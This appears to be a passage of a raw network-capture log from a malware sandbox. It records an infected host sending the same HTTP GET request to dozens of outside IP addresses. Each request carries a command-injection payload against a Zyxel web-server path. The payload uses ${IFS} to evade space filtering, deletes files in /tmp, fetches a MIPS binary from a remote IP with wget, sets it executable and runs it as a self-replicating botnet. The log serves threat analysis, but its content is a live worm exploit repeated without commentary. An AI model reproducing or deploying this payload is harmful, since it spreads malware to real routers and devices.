                                        Jan 14, 2024 16:18:42.398389101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3663192.168.2.1349730166.118.118.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398463964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3664192.168.2.133976654.229.194.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398503065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3665192.168.2.1343418149.115.115.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398528099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3666192.168.2.1338892200.179.36.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398564100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3667192.168.2.133588490.127.65.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398618937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3668192.168.2.134299696.146.61.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398665905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3669192.168.2.1341066106.22.48.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398720026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3670192.168.2.135568643.254.175.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398756981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3671192.168.2.1345284220.107.149.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398782969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3672192.168.2.134317020.237.28.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398834944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3673192.168.2.134499053.90.0.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398894072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3674192.168.2.134017073.80.157.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398920059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3675192.168.2.1344970111.68.92.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398947954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3676192.168.2.135018025.34.9.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399023056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3677192.168.2.13446261.9.154.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399050951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3678192.168.2.1344480176.149.49.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399072886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3679192.168.2.134524488.208.166.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399125099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3680192.168.2.1339992172.98.45.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399146080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3681192.168.2.1346058219.243.146.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399230003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3682192.168.2.1355436188.17.30.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399250031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3683192.168.2.1359834203.191.21.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399298906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3684192.168.2.134004067.176.235.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399327993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3685192.168.2.1343244222.63.25.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399378061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3686192.168.2.1340216126.32.187.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399396896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3687192.168.2.134680861.47.168.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399463892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3688192.168.2.1341148156.117.73.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399519920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3689192.168.2.1346228117.7.183.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399563074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3690192.168.2.1346766211.254.77.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.399586916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3691192.168.2.134177446.242.117.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401225090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3692192.168.2.1360310160.221.244.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401292086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3693192.168.2.1343464213.187.152.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401307106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3694192.168.2.1348906199.63.24.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401391983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3695192.168.2.1355414165.121.222.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401417017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3696192.168.2.1346444160.66.250.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401472092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3697192.168.2.1358474212.134.64.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401503086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3698192.168.2.1351304201.151.210.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401568890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3699192.168.2.1356346223.36.28.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401595116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3700192.168.2.133733481.54.101.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.401633024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3701192.168.2.134162081.3.50.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403383970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3702192.168.2.13448402.26.187.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403445959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3703192.168.2.1345600193.28.152.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403495073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3704192.168.2.135113044.199.163.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403542995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3705192.168.2.133531649.199.97.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403584003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3706192.168.2.133600880.70.37.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403605938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3707192.168.2.133782264.96.27.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403644085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3708192.168.2.134620475.45.200.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403700113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3709192.168.2.1348490131.245.50.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403733969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3710192.168.2.134790487.42.20.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403765917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3711192.168.2.135867449.153.212.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403800011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3712192.168.2.1335768205.180.10.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403834105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3713192.168.2.134928044.102.193.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403877974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3714192.168.2.134010867.247.13.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403914928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3715192.168.2.133757245.227.166.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403935909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3716192.168.2.133975812.238.29.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.403987885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3717192.168.2.135937882.47.10.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404027939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3718192.168.2.1333370138.109.180.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404041052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3719192.168.2.1359324188.87.240.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404072046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3720192.168.2.133899275.39.73.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404099941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3721192.168.2.1360722160.156.202.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404148102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3722192.168.2.133502077.226.223.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404189110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3723192.168.2.1351216110.208.176.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404207945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3724192.168.2.1354220203.237.138.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404251099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3725192.168.2.133724871.94.168.218443
                                        TimestampBytes transferredDirectionData
